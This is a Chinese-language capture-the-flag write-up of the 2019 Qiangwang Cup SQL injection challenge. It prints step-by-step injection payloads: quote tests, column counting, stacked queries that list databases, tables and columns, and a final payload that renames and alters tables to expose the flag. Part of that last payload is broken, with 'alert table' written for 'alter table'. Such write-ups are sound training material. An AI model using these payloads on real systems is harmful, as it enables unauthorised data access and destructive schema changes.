[强网杯 2019] 随便注

每天学习网络安全知识，本文记录强网杯的一个SQL注入题。

使用单引号测试，发现页面报错，说明此处存在SQL注入漏洞。

1'
1''

既然此处存在漏洞，那么我们就走正常流程测试下，如果不知道SQL注入正常流程的可以取看下我的sqllibs注入教程。

1.猜字段数

1' order by 3#
1' order by 2#

使用第一个payload测试的时候发现页面报错，再使用第二个payload时发现页面显示正常，因此我们可以得知当前数据库当前表存在2个字段。
这时候尝试union select进行联合查询。

2.使用联合查询

return preg_match("/select|update|delete|drop|insert|where|\./i",$inject);

发现页面提示过滤了许多关键的命令，看来需要一些骚操作了。

3.尝试堆叠注入

1';show databases#

发现成功爆出所有数据库。
使用show tables;试试看看能不能得到表名

-1';show tables#

成功爆出当前数据库的两个表名；尝试查询表中的字段

0';show columns from `1919810931114514`;#

发现有一个flag字段，接下来就是尝试读取flag。

4. 再查看words表的结构

0';desc words;#

可以猜测我们提交查询的窗口就是在这个表里查询数据的。

5. 那么查询语句很有可能是 : selsect id,data from words where id =

然后1919810931114514只有一个flag字段
这时候虽然有强大的正则过滤，但没有过滤alert和rename关键字
这时候我们就可以已下面的骚姿势进行注入：
1.将words表改名为word1或其它任意名字
2.1919810931114514改名为words
3.将新的word表插入一列，列名为id
4.将flag列改名为data

1';rename table `words` to `word1`;rename table `1919810931114514` to `words`;alter table `words` add id int unsigned not Null auto_increment primary key; alert table `words` change `flag` `data` varchar(100);#

成功拿到flag。